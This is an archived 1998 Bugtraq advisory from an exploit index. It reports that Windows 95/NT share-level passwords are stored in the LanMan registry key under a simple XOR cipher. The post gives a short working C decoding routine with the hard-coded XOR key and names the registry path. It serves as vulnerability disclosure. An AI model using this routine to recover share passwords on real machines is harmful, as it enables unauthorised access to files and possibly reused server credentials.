Windows share passwords are right there in the registry and poorly encrypted

Summary
Description:Share encryption is by a simple XOR and the passwords are stored in registry entries such as SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\Parm1enc .
Author:a42n8k9@redrose.net
Compromise:With local access to a windoze box you can determine the read-only and full access passwords to the file system/printer/etc. Also these passwords might be the same as for more important access (ie to company servers).
Vulnerable Systems:Windoze 95, NT
Date:9 February 1998
Details


Date: Mon, 9 Feb 1998 01:32:25 -0500
From: a42n8k9@redrose.net
To: BUGTRAQ@NETSPACE.ORG
Subject: How one small flaw could lead to major problems

Greetings,

First off I would like to appologize to aleph1.  It would appear that an
original draft of this got sent direct, before I had completed my
thoughts on it.  I will try and be more carefull when wielding a loaded
mouse.  (hope no one got hurt)

And now for the stuff ...

While perusing the rootshell.com site, I came accross the file
"sharepw.c" under January's archive group.  The program demonstrates the
ability to decode the Windows95 "share-level" password.  Curious, I
downloaded the file and began to examine it.  The file itself weighs in
at 883 lines in length, though largely commented.  The code contains
what are termed "pairs", "quads", "blocks", and "tables" that are used
to decipher the password 'inline'.

Upon further examination, (by mere chance actually), I noticed an
alarming similarity developing between the coded and decoded passwords.
Someone please correct me if I am wrong, but it would seem that the
"share-level" password is nothing more than an Simple-XOR cipher.  With
this being the case, the 883 line program gets reduced the the few line
you see below.

u_char key[] = { 0x35, 0x9a, 0x4d, 0xa6, 0x53, 0xa9, 0xd4, 0x6a, };

void CrackSharePW(u_char *PW, u_long Size) {
    PW[Size] = '\0';
    while(Size--)
        PW[Size] ^= key[Size];
}

The passwords can be found in the registry at:
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault